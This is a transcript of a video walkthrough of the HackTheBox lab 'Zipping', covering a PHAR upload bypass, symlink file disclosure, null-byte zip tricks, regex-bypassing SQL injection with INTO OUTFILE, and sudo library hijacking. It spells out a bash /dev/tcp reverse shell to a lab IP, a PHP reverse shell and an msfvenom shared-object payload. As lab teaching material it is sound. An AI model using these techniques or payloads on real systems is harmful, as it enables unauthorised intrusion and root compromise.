What's going on YouTube? This is Ipsec. I'm doing zipping from HackTheBox, which is a PHP web app that starts off with a file upload vulnerability, and that just seems like a really hard thing to secure. The upload accepts a zip file and will give you the first file back in that zip. So if you zip up a symlink and send it, you can do a file disclosure vulnerability and leak files off the server. That will allow you to discover a LFI that appends.php and has a file exist check beforehand, which blocks a lot of the PHP wrapper shenanigans that we've done in previous videos. The other vulnerability is a SQL injection that you can abuse to do a file write, so you can write a PHP file to the server, then include it. That is the intended way. The unintended way, you can just zip up a PHAR archive, and the PHAR archive is going to bypass the file exist check because PHP treats that as just a file, and you can just skip the SQL injection altogether. Also, if you put a null byte in the zip, some weird things happen, so let's just stop talking and get into it. As always, we're going to start off with nmap, so -sc for default scripts, sv enumerate versions, oa output all formats, put in the nmap directory and call it zipping, then the IP address of 10.10.11.229. This can take some time to run, so I've already ran it. Looking at the results, we have just two ports open, the first one being SSH on port 22, and its banner tells us it's an Ubuntu server. We also have HTTP on port 80. Its banner tells us it's Apache, also running on Ubuntu, and we have the title of the web page, which is just the zipping web store. So let's go take a look at the web store. So going to 10.10.11.229, we get to the page. So I'm just going to click around, find all the links, and if I go to shop, we're going to have a different site. We have it opening up in shop. If we go, whoops, I clicked it again. Let's go to contact. We have a contact form. So let's just try ipsec root at ipsec.rocks, and then please subscribe. So I'm going to intercept this response. Let's make sure our proxy is set, run it, and our contact form doesn't send any data. It is telling us we have a PHP session cookie, so we know we're in PHP, but other than that, nothing else really there. We can find out if we're PHP by just trying like index.php and seeing if we get a page, and we do. There is this work with us link, and we have a file upload form. So we could either start here, or we can start at the shop. I like just clicking around to figure out everything the shop offers or the website offers before I go looking for any vulnerability. And I would also be running like a Go Buster in the background while I work, but I'm not going to do that here just for sake of time, right? And when we look at the shop, we have two parameters. We have a page and ID. Now, whenever I see page, I think of like some type of LFI or file disclosure vulnerability. So I'm going to search the source, and I'm going to see where page exists, and we see it exists either cart or products. So this can be two fields. And if we wanted to really test for LFI, we could try including index, right? Try including something it doesn't expect. So you do index, and it just crashes. If I go over to curl so we can see the header, it sends a 500 internal server error. So I do think this is LFI, right? The behavior is because index.php is including index.php, which then includes index.php, which then includes index.php until you run out of memory and it crashes. We can try going up one directory and including index, and we get the home page, right? It's kind of like broken because we're in the shop directory, so everything is trying to link to does not exist, but we can include this. So this validates we are in a include statement. So normally my next step would be PHP convert. Actually, it's PHP filter / convert dot base64 -encode resource is equal to index, and see if we get a page. We don't. We just get the product page. I'm just going to put gibberish in here, and we get the product page as well. So what this is telling me is we're in an include statement, but there's something preventing us from accessing the PHP filter. So one of two things normally breaks this, right? You put something before the include, and we know that's not the case because when we include index.php, it doesn't. And why that would matter, let's say we're including files out of templates. So if it prepended templates do this. When we do a PHP filter, it doesn't work, right? So that could have broken it, but we already know that's not the case. The other thing is it could be testing like if that file exists beforehand, right? So it's not going to include things that don't exist, because if you do if file exists on this filter, it's going to return a false. So that leads me to the upload vulnerability, right? Or I said vulnerability already, but the upload functionality. If we can upload a file, then we can pipe it over to this include and get code execution. So let's look at this. If you're interested in working with us, do not hesitate to send us your curriculum. Application only accepts zip files. Inside, there must be a PDF containing it. So it looks like we have to zip up a PDF. I'm just going to use text. I'm not going to put a full PDF and see if it works. Let's just call it note.txt. I'm going to put please subscribe. And I forgot, this probably should be PDF. Note.txt to note.pdf. And then let's zip. So we'll create note.zip and zip up note.pdf. So when we upload this, let's go to HTTP, zipping. That's not what I wanted. HTTP, zipping. Let's go to the directory. There we go. Upload note.zip. Let's intercept this request so we have it. I'm going to send it to the repeater tab and also click forward. And we see it uploads it. So let's do a curl against this. And we get the file. So now we can write files straight to this directory. The issue is we have to control this extension, right? Because the file include vulnerability we have always appends .php to this. So my next step would be, what if we didn't have note.pdf and if note.pdf was note.php? So let's do that. Let's remove note.zip and then zip this back up. So note.php, note.zip. There we go. So now we have a new one. We actually probably didn't have to do that. We could just do it through repeater tab, right? Because we could do that. That'd be an easier way. So this is the zip content, and I'm just changing the string. So it's now a PHP file. And we see the unzip file must have a PDF extension. So the next thing I would do is try putting a PDF first. So 1, 2, 3. That's going to screw up. So let's just redo it. Zip archives, they're very picky with length. So I was hoping I could put .pdf before PHP, but I'd get rid of the entire file name. Like I have to do that, which I don't want to do. So let's now create a new thing. Note.zip. I'm going to move note.php to note.pdf.php. And then we can zip this up, zip, note.zip, like that. And now we will go back to the upload. Attempt to upload, and it doesn't. So it's checking that PDF is the last characters. We can go try doing null bytes, but we're going to talk about that next or later in the video because that's a different unintended. One weird feature with PHP is a PHAR archive is going to say it exists. So if we did, let's see, I'm trying to think of a good way to do this. What if I just do echo file? Is it file exists? Yep. Note.php, I think, is here. What is our file? Note.pdf.php. So that exists. If it doesn't exist, it doesn't echo, right? So if we did a PHP filter convert dot base64 encode resource is equal to this, it doesn't work. But there is the PHAR extension. So if we do PHP, I think it's just PHAR before PHP, like that. That does not work. What is it? Let's try the zip archive. There we go. So what's happening here is a PHAR is like a PHP archive. It is essentially just a zip. So with phar, we can validate it exists, and you can actually go into the zip like this. So we can do note.pdf.php and see it also exists. If we do ASD, it does not, right? So with this, we can actually upload a PDF to it. So what I'm going to do is, let's get rid of all of note, right? And I'm going to copy user share laudanum, PHP, then PHP reverse shell. It's been a while since we used this script, honestly. So I'm going to delete all the comments just because we don't need them. And we're going to change the IP and port. So I'm just going to do 10.10.14.8 and then port 9001. So we have our PHP reverse shell. I'm just going to rename it to shell.php, or name it pwn.php. So we have this. So we need to create this into a phar archive, and we could just use zip for it. So I'm going to call it pwn.zip, pwn.php, and phar archives don't care about extension. And this extension needs to be PDF for the website to accept it. So I'm going to rename pwn.zip to be pwn.pdf. Okay, so inside of pwn.pdf, let's see, is it still going to work with the extension? We do have pwn.php. So we're going to zip it one more time. So we're going to do a zip on pwn.pdf, and we're going to call it pwn.zip. I'm going to do pwn.pdf.zip so you can see the full extension. We reversed the argument order. So now, when the website unzips pwn.pdf, it's going to see a file, pwn.pdf, and this is really just a zip that contains a file, pwn.php. So if we went to this, we upload, we see it's uploaded. If we do a download of this file, so let's just wget like this, do a file pwn pdf.1, it's going to say it's a zip. So now we want to go back to the LFI vulnerability. So we'll go, let's do it in Burp Suite so it's easier to see. Okay. And for the page, we're going to go up one directory because we don't want to be in shop. And then we can say, where is the URL? What do we upload? It's this. So copy this, paste. So now we go up one directory, uploads pwn.pdf. We have to put the phar wrapper on it. And then we're going to say, we called it shell, right? And that did not work. I wonder if, did it get cleaned up? File pwn pdf 2, zip archive. It did not get cleaned up yet. Let's see. I wonder if we can't use like the relative path here. So let's do var www html and assume that's where it is. Still did not work. Let's see. Is this, we're downloading 8093E, 809 D3, D3. That looks good. We're definitely messing something up here. www HTML uploads, pwn.pdf. Did I say shell and not pwn? Let's do 7zl pwn.pdf.1. We called it pwn.php. So this should append.php to this, and we should execute. Where do we have wrong? Doesn't like something. For www HTML uploads. I thought that's where it existed, but maybe uploads are not here. I'm going to try re-uploading this and just saying what happens, because this is not making full sense to me. So I'm going to go to upload. You upload this. Let's see, is it going to be 80D3? We're probably intercepting. Okay, so it is still 80D3 and it ends with 5F. 80D3 ends in 5F. That should be right. And we should just be able to hit pound. Looks like it worked. I'm guessing maybe a cleanup script happened and that prevented us, right? But we get a shell in the box as Rektsu. That is the unintended way to do it. So let's go to a different unintended way. So we're going to do 2 unintended ways to solve this, and then we'll do the intended way. And I'm just doing them in kind of like logical order. So the vulnerability here wasn't intended for you to be able to get code execution. The whole like PHAR wrapper, this was unknown at the time when the box released, at least to us, right? So the next step we had is the vulnerability here is being able to symlink, right? So zips do follow symlink, so you can. So I'm going to remove pwn.pdf star. There we go. So I'm going to make a new directory, and this will be zip, I guess. Let's do ln-s etc passwd to file.pdf. So now we have file.pdf, but it points to etc passwd. If I do a zip and then we pass the symlink command, so we'll call this file.pdf.zip. We'll zip this up. And if we upload it, go to browse, let's upload, go here. Browser thinks it's a PDF, so let's curl it. We get the passwd off the server. So it's a vulnerability similar to, I guess, zip slip, but it's not exactly that. It's just because when it unzips it, it's preserving the symlink, and that's an intended thing. So that allows us to read files. So the next step would be to build a script here so we can just automate this and read a bunch of files off the server, right? So I'm going to create, let's see, what are we going to call this? I don't want to call it pwn.py. We'll call it LFI.py, I guess. It's a horrible name, but oh well. So I'm going to open up Visual Studio Code, and I'm going to create something that just scripts this out so we can get a lot of files at once. This is actually not a LFI. Let's delete that. I'm going to call it file disclosure. We'll call it fd.py. I say it's not an LFI because for me, LFIs require include statements, which will execute code because it's local file inclusion. And here we can just disclose source code. We can just read files. So to me, that's a file disclosure. So let's see. What do we want to do here? The first thing is we're going to have to import a few things. We know we're going to need requests because we have to make an HTTP request. We probably want IO. And IO is going to allow us to create a zip file in memory, so we don't have to just create files on the disk and then zip them up. And then I think we want zip file, right? So the first thing we have to do is create where we want the zip to be. So I'm just going to do payload io.bytes.io, and that may be a bad name. Okay, so whenever you see payload, that is going to be the zip file, right? It's going to behave just like a file on disk, but it's in memory. So now we want to create a zip archive. I'm going to call this note.pdf, or we'll call it resume.pdf because that's, I think, what we're supposed to be uploading, a resume. And then the next thing we need to do is have this to be a symlink. Let's Google Python zip symlink. Can we do this? Maybe we want to do create as well. Python zip file create symlink. See, archiving symlinks on Stack Overflow. Let's see, is there a implementation? Looks like here. We can paste this. They have zip info with a capital I. Okay. Let's see, import stat. There we go. So what stat is doing is this is setting all the file attributes. So this creates the symlink portion. So now we want to create the zip. So we can do zip out. And then instead of the file name, I'm just going to put payload. We write link target. What is link target here? That's the file. So this, we'll say create zip target file. Like that. Okay. And we want to return payload get value. So this is going to return the zip. So if I did a create zip of, let's do my Etsy passwd file. Let's say print this. Let's do Python 3 fd.py. We have a zip here. So if I output this to file.zip, we do a 7zl on this. Oh, file.zip. It is not a archive. Oh, it's got the B encoding. There we go. Oh, no, it's still not. Wonder if that's just how we're writing it. With open, let's do file.zip, binary as f.write. What's this going to do? See, must have exactly one create mode. Write binary. Okay. There we go. So let's 7zx to extract this. And we have resume pointed to resume.pdf. Oh, that's what we had. Right. So that file, yeah, this should be Etsy passwd. So let's do, I can delete every file other than fd.py. So let's delete that. rm file.zip, rm resume. Okay. So now when I execute fd.py, we get a file.zip. We extract it. And that's pointed to Etsy passwd. So now we have a Python script that will create a zip file for us. So the next thing we have to do is have this actually upload it, right? So let's do, let's call upload file, I guess. No, we don't even have to create a function. Let's just do URL is equal to HTTP 10.10.11.229. We upload it to upload.php. And then we want to create the payload. So we'll do payload is equal to create zip. And then this is going to be the argument, right? So I'm just going to hard code it to etc passwd here. Once it works, then we'll do arg parse and have it accept something. So let's see. I don't know. We want to do files is equal to, and then we have to give it the parameters. Where is a file upload form? So let's see. The first parameter we want is the name, which is zip file. So we'll do zip file like that. And then we'd give it a dictionary like this. And I'll call it file.zip. And inside of that will be the payload. Okay. And then there's a second parameter, which is submit. So I'm just going to say data is equal to submit like that. And submit has no value here. We just want to make sure this exists, right? So that should be enough for us to do a request. And then we want to get the contents of this. So R is equal to, let's see. So we make the request and then we just do r.text. Let's just print this. This is going to be the HTTP response, right? So let's do Python 3 fd.py. If you're interested. So it uploaded successfully and we get this MD5 sum. Now this MD5 sum is the MD5 sum of the file we upload. So we can either have regex or crawl this and grab this MD5, or we can just calculate it ourselves. I'm just going to calculate it myself because whenever I can avoid regex, I know I'm going to be happier, right? So let's just do def calculate MD5, give it the data, and we can say MD5 hash is equal to hash lib.md5. We want to import hash lib. Then we can say hash update return hex digest. There we go. So we posted the file, and then we want to just get the next file. So we'll say r is equal to request get 10.10.11.229 slash upload slash, let's make this a f string. We'll say md5 slash, we called it resume PDF. You can say md5 is equal to, calculate that of the payload. So let's see what happens with this. Boom, now we have it so we can get any file off the server. So we could either like import CMD and make a command line application around it so we just can grab files quickly, but I'd rather just use arg parsing so I can direct a file to save it. So let's do that. Let's go back into Visual Studio and we're going to just import sys, and then where we create the zip, we can say sys.argv1. So we just grabbed the first argument. I didn't actually use arg parse, but that should be fine. So we run this, say etc passwd, we have that file. So if I want to, I could easily just save it with redirecting it. So what I want to do is, let's do proc self cmd line. We can see we're in Apache. So we could go to like etc apache 2 sites enabled 000 default.conf. This is the default Apache configuration. And this would tell us all the locations, right? Like var www HTML, we can see uploads goes in here. So we already kind of knew that information. So let's just get the source code of the application. So I'm going to do var www HTML. Was it upload.php? Is that what we're doing? Yes. So this is going to be the source. And this is the whole reason why I did not want to use CMD, because I want to just quickly write a file, because I like syntax highlighting. Let's see, where does the PHP code begin? Here we go. So this is going to be the PHP code. And here we're creating the MD5 hash. That's what we did in the Python, right? We have temp_dir. We're creating a zip archive. And it's going to get the name index. So this is going to get the very first item out of the zip. Make sure it is PHP. Also, we're making sure there's only one file in the zip, right? So only one file, first file, has to have extension PHP. And then we're doing a exec call. And we're going to run 7-zip to extract it. So you may think there's command injection here, but because we're in the single quotes, there is not. So we can't just like put a command like this, right? So that doesn't work. This one, we don't have the ability to do anything with this because we don't control that, right? Upload directory is the file hash. So the only place we have real user input is in a properly escaped, well, I don't want to say properly, but in a place where it's not easy for us to get code execution. Then we do this file exist call. We kind of already figured, this is a different file exist. So when it uploads, it's going to make sure the file exists. If it does, it's going to rename the upload path to the upload dir. The upload path is really sys get temp dir. And this may not look like a PHP function, but it is. Let's do php-a echo sys get temp dir. It's just going to be temp. So first we write the zip into a temporary directory. We make sure it exists, and then we move it to the upload directory. When the box was released, there was an unintended around this that lets you upload a zip with a null byte. So let's do that real quick, because this behavior is interesting. So let's see. We have file.zip. Trying to think of a good way to show this. Let's go back to pwn.php, and I'm going to copy pwn.php to pwn.php.pdf. I'm going to put 2 periods here. Okay. So now I'm going to zip pwn.php pdf. I'm going to call it pwn.zip. That's fine. And I reverse those again. There we go. So we have this zip, and if we had a good hex editor, do I have bless in this? I don't have bless. Let's see. We can use Burp Suite's hex editor. That'll be fine. So if we go here, we have pwn.zip. That's not what I wanted. Is it? What did I just make? Okay, I did make that. We add this. Let us intercept it. Intercept on in both locations. Upload it. And what I want to do is go over to repeater. Let's go into hex. And we're going to modify our thing. And this may be painful because of how big our zip is. I'm going to make a zip smaller. Let's do pwn php .pdf. Let's remove pwn.zip. V, we'll call it shell.php. PHP system ID. Let's just run that command. If we get that, then we know it's executing. Or do PHP info. That's always a good one. Okay. Because we've already proved we got a shell with the other method, so we can just do it this way. So we have shell.php there. Let's rename it to shell PHP PDF. We actually want 2 periods, my bad. And then we want to zip this like that. Okay. Now I'm going to upload and we're going to look at the hex and see it is much, much more manageable. Browse this, upload. This looks much easier, right? So if we go over to hex, let's make this bigger. All I want to do is find where we have the 2 periods. So let's see, 2E, 2E. I'm going to put a null byte here. So it's on the second one. You could do the first one as well, but the second one's the only one that matters. So when I put this here, we see the file was uploaded. But if we attempted to go to this file, let's just turn intercept off. So a browser gives it to us. Let's see. That's not what I wanted. Go back here, repeater. We're going to get this hash. If I go in this directory, the file is not here. And that's because, let's go back into zip, vim, upload.php. We failed this check. So it never renamed it to move it, but the file still exists. So if we went to the LFI, let's go, do I still live in Burp Suite? We go here. We can probably do page is equal to, let's do temp, then uploads shell.php like this. And that did not work. The script appends.php, right? So there we go. We have it. This is the PHP info page that we put in the shell. If I click render, we can see it. So what exactly happened here? So if we go here, what's happening is a different behavior between how PHP is handling zips and how 7-zip does, right? The actual format of a zip file is weird. 7-zip is treating it as null terminated, but there's also a length somewhere. So PHP is using the length so it reads past the null byte, right? So let's see, where's shell? So probably this is some type of length or something, right? So PHP just says, okay, I have, let's say 12 bytes to read. I'm going to read 12 and that's going to be the file name. What 7-zip's doing is, I think it's probably saying I have 12, but it's hitting the null byte, so it stops reading here. So that's why it only drops shell.php to the disk. Now, the other interesting thing, that is just the interesting, that's all, right? So when PHP sees it, PHP reads past the null byte, so it sees the extension's PDF, but when 7-zip's actually doing it, it's not going past the null byte. That's why it just drops the PHP. The file doesn't exist because the upload path file name, this includes the null byte, and it's saying the file doesn't exist because the .pdf extension does not exist, so we never rename it, which moves it out of the temp directory. So hopefully that makes sense. So that was the other unintended with the box. We can finally go and talk about the intended solution, which includes some SQL injection. So let's go back to a Pwn script. We execute fd.py and we go to var www html shop, and then there were 2 files. What was under shop? Product and cart. So let's look at product.php and let's direct this to a file. So let's see. The first thing that really sticks out is a really nasty regular expression right here. So we have an if match, And then if it does, it redirects us to index.php. And this is matching on ID. So let's go to product. Let's just do 2, I guess. I'm going to send this over to Burp Suite, intercept on. There we go. So if the product matches this regular expression, we just get a redirect. So let's see, it looks like we can't have any special characters or numbers. So if I just do ID is 2A, we get a redirect. So the redirect is bad. So looking at this, let's break down this and regex. And this is going to be really silly because it looks like this caret would apply to both of these, but this pipe is really a big OR. So we got 2 different regexes essentially. The first one is going to be like that, and the second one is this. So the vulnerability here is twofold. The first is primarily because of this caret, and we don't have a /m. It's not going to be multi-line. This regex will be multi-line because we're not looking at the beginning of a line. The caret inside of these brackets, that means not. If you put a caret as soon as you put like the bracket, that is, it's not one of these characters. If it's not within that, that's like when the string begins. So we have, if the string begins, then match any character star, and then we have a bunch of special characters and stuff. It's going to return to the index.php. But because we don't have .all, which is the Python way to do it, or /m for multi-line, this period isn't going to match line breaks, which means this regular expression is not applied if we have a multi-line input. This one will be, so we have to make sure we end with a number, because if it's not a number, we also go to index.php. So let's test that logic out real quick. So if I do 1a, let's do a1, because we want to make sure we end with a number, right? We go 302 found. Now let's insert a line break. So I'm just going to do echo xxd. A line break should be 0a. So I'll do %0a, and we get the product does not exist because we have a line break here. So what was stopping us before, where was I? Here, was this regex, right? But by putting the line in, now it's not going to match because it's not multi-line here. So we only got this regex, right? So if I did 1a, we have a 302 found. So A1, that's good. If we just do 1, we get the product ID of whatever 1 is. Let's see, what is that? It's going to be the smartwatch product. So I'm going to add this. I'm going to auto scroll here. So when I do it, we have that. If we did not exist, we see it doesn't auto scroll. So now let's test for SQL injection. So I'm going to put a single quote. We have an error. Let's put a comment. We still don't have a match, but again, that's because of the regex. I'm going to end it in a number, and now we suddenly have smartwatch. So we have validated, we have SQL injection. We just have to make sure we have a line break, and we end with a number. Let's kind of go into why that's SQL injected, right? The comments do tell us, but let's pretend these comments don't exist. So if you wanted to, you could pause and read them. But many people may overlook this because we have a prepare statement. And normally when you do prepared statements, that's how you patch SQL injection, right? Everyone says use prepared statements. Well, let's look at PDO prepare. So let's do PHP, PDO, prepare, go over to Google. Let's make sure I'm not intercepting. And let's look at the manual. Because what they did not do is when you do prepared statements, you don't just put the parameters right here, the variables. It's going to want to use probably like a question mark, right? They give 3 examples. The one I like is just doing question mark. So how we would harden this is we'd put a question mark here, and then on execute, then we'd say ID, right? So now it knows this parameter is going to be the first parameter here, and that's ID. And because you do it this way, the library can properly escape everything. So let's undo these comments. So now that you know how you would recommend the fix, let's exploit this. So going back here, we want to be able to write a file. And the MySQL user, let's see what we run as. Let's go. Actually, we can go back to product real quick. Let's see, PHP, no ID. How is it authenticating to the database? Oh, because it loads index first. That's right. Let's look at index.php. And it's going to include functions. So let's look at functions. And here we have MySQL running as root. And root can generally write files, right? So let us try this. So we have ID 1. So we write a file. Well, we could do union injection, grab all the passwords, right? That's not going to help us here. And I think the video's gone long enough where you don't need to watch me. Well, let's do it actually. Let's just extract things. Select one. Let's see. Internal error. Internal error. How many parameters do we have? Looks like 8. So we have 8 parameters. Do we have any of these that get put out? See, the first one's probably going to be ID. If I do like this, is it going to output them? So I don't want the smartwatch. Oh, we have to make this not exist. So I'm going to do 999. There we go. So $4 so we can definitely write here. So if I do please subscribe, we can look for this. Right. So what I did here is before my SQL injection, we had a 1 here, which was matching the smartwatch product, and it was grabbing the very first line. So it always grabbed that, so we couldn't see all the parameters we were writing through the SQL injection. So what I did was I made sure we got a product that did not exist. So I did my union injection. The only line that returns is the one I'm putting in, which is this, right? So now we can just do SQL here. I like just wrapping it in parentheses. So we can do select 2. We probably have to URL encode everything. So our please sub was 2. So let's see. We want to extract all the tables. Well, I should have said tables we care about because we don't want to dump all the tables and columns of information schema because that's going to be a lot of data. So first, we have to just dump a list of all the databases on the server. So let's do a select and then schema name from information schema.schemata, like that. And we have to do a group concat because this is going to return multiple rows. We want to put them all on one row. And of course, we have to URL encode this. So do this, we go down, and I'm just going to change my search for that string. So we always see it, or we always go down to this spot. So we have information schema, sys, zipping, MySQL, and performance schema. So we probably want the zipping table. So let's now do a select group concat. We probably want the table name. We don't put it in quotes. And we want table, is it column? Let's look this up. Information schema. This table reference, columns, column name is what I want. Column name. And then we want to put a line break, so \n. We do information schema dot columns because that's the table we want. And then we say where table schema, because this is going to be the database, is equal to zipping. And again, URL encode this. And we can see all the tables and columns here. There's nothing really of interest, right? We just have the products. We don't have anything where like passwords would be. So we could like dump the MySQL users table, but we're already got the root password from the file disclosure. So that doesn't really buy us anything. So we got to think what we can do with this SQL injection. And since we're the root user, we can write files. And we had a LFI vulnerability back here, right? And if we didn't do it the unintended way, we don't have a way to create a PHP file on this. So what this SQL inject does is allow us to. So let's now, instead of doing a select group concat, let's get rid of all this. And I'm going to do a select, and we'll do a double quote, curl, 10, 10, 14, 8. Yeah, we can do a curl. That's fine. Let's do port 8000. And maybe the box doesn't have curl. I always hate using binaries like that. Let's echo a shell. So to do that, I'm going to go back to my terminal, and we're going to just write out a shell. So we'll do bash-i, then, whoops, dev tcp 10, 10, 14, 8, 9001, 0, and 1 like that. And then let's base64 encode it. And I want to get rid of all the special characters because I don't feel like having URL encoding screw me up, right? So like that. There we go. So I'm just going to decode this real quick, pipe it over to bash. Let's just make sure it works. It does. So now we have a nice one-liner we can copy. So we can do select, and we want to write a PHP shell here. So we'll do like that, PHP, and then system echo this, base64-d, then bash. We end the single quote, end the system call, and the PHP call, and the double quote. So if we URL encode this, I just want to look at it, make sure this looks good. PHP system echo. We don't have a semicolon. I don't think we need one because it's only one thing, but oh well, or one line. Echo this. That looks fine. Let's see, is there anything else I want to do? I don't like that being 3F. Okay. I didn't want to URL encode the question mark. I don't know if that would screw anything up. So we have that select. And now I want to do an into out file. We can say dev shm, and we'll call this shell. And this should probably be in quotes as well. We use double quotes. URL encode this. And we want to add the PHP argument. So when we write this, we have an internal server error, but this happens a lot when you do union injections and write a file. So let's go back to the LFI. And what do we call it? We called it shell, right? Shell.php. Let's LFI. We can say dev shm shell. And we should listen. We don't have anything. Let's see. I don't know if this actually wrote. So we do that select. This should have wrote. PHP system echo 64-d. Let's try var lib MySQL. Can we write there? We still go in here. Let's do LFI, var, lib, MySQL. Still not. So we have something messed up here. I'm not exactly sure what. I'd be hoping that this just writes. So let's test this out. I'm going to copy this. Let's unURL encode. Oh, unURL encode. Copy. Then I'm going to sudo service MySQL start. And then we can do sudo MySQL. We can run this command, and that is not what I wanted. There we go. So if I run it, it says it's successful. If we go to dev shm. Oh, we wrote to var lib. Let's write to dev shm. Okay, so that writes, and we have exactly what we want. So I wonder if we did a select. So we're going to nest it. I wonder if the nesting is what breaks it. We can't overwrite, so I think that's what did it. So it's the whole nesting these selects into out file. So that's what broke it. So since we know that, let's now take this. We can remove this piece. So now we just have this shell. And I'm going to put it at the end. So we'll do plus into out file. And I can say, let's do dev shm shell.php. We get product doesn't exist. So if we go back to the LFI, we can try dev shm shell. It's hanging. That's a good sign. Go down here, and we have a shell. So that is doing it the intended way. So let's do Python 3, import pty, pty.spawn, bin bash. And then stty raw minus echo foreground. And then we can export term is equal to x term, so we can clear the screen. So now as a shell as Rektsu, let's see, can I do sudo? It looks like you can run this binary stock as sudo. So if I do sudo user bin stock, it wants a password. And that's going to be a password to the stock binary. So let's just do strings against this. Do we see anything? So we see a password potentially here or here. I'm going to guess this one is the password. So let's do sudo user bin stock, put this password in, and we can see the stock. We can edit the stock. I have no clue what I'm doing. Or we can exit the program. So we could open this up in Ghidra, but before I do that, I always like just running strace on the program. So let's just do strace on this. And if we enter the password, this is going to be like syscall tracing. It's going to tell us everything it's doing. And whenever I see something like this, no such file or directory, it's trying to load a library and doesn't load it. So this is kind of like DLL injection or something on Windows. It's loading something out of config on libcounter.so. I don't know if that's going to go to root if we do it with sudo, but what if I just put it here and we can test it out, right? So we want to create a malicious Linux library that will probably send us a shell whenever it runs. So let's do that. And we could ask like ChatGPT a fancy way how to create a C program for us, but I mean, let's just stick to the classics, right? We don't need to use AI when we have MSFVenom. So we can do MSFVenom and then list payloads. I know I want like reverse TCP. So let's see what it goes with. This always takes longer than I'd ever expect it to. But what we're going to do is create a payload that will just connect back to us. So it's probably Linux x64 shell. Let's see. We want the shell underscore reverse TCP because we don't want the this one because this is staged, which means we have to run like MSF handler to catch it. So let's do the stage list one. So we can do MSFVenom, then do -p, the payload. It probably wants L host 10.10.14.8. L port is equal to be 9001. The format is going to be elf-so. And the out file, we can call it libcounter.sl because that is what the strace told us. It was trying to load this. So I'm going to go in .config. Okay. So let's move libcounter to be HTTP zipping dub Python 3 m HTTP server. And we can wget 10.10.14.8 port 8000 libcounter.sl. Okay. So what was that password again? Let's strings or sudo-l strings user bin stock to get the password. I should have wrote that down. Let's see. There we go. And the password is generally around the string where it says enter your password, just because that's how it's organized. So we can do sudo user bin stock, enter the password, and it immediately exited. Let's do 9001. Let's run this again, get a connection back, and we are root. So that is going to be the box. Hope you guys enjoyed it. Take care, and I will see you all next time.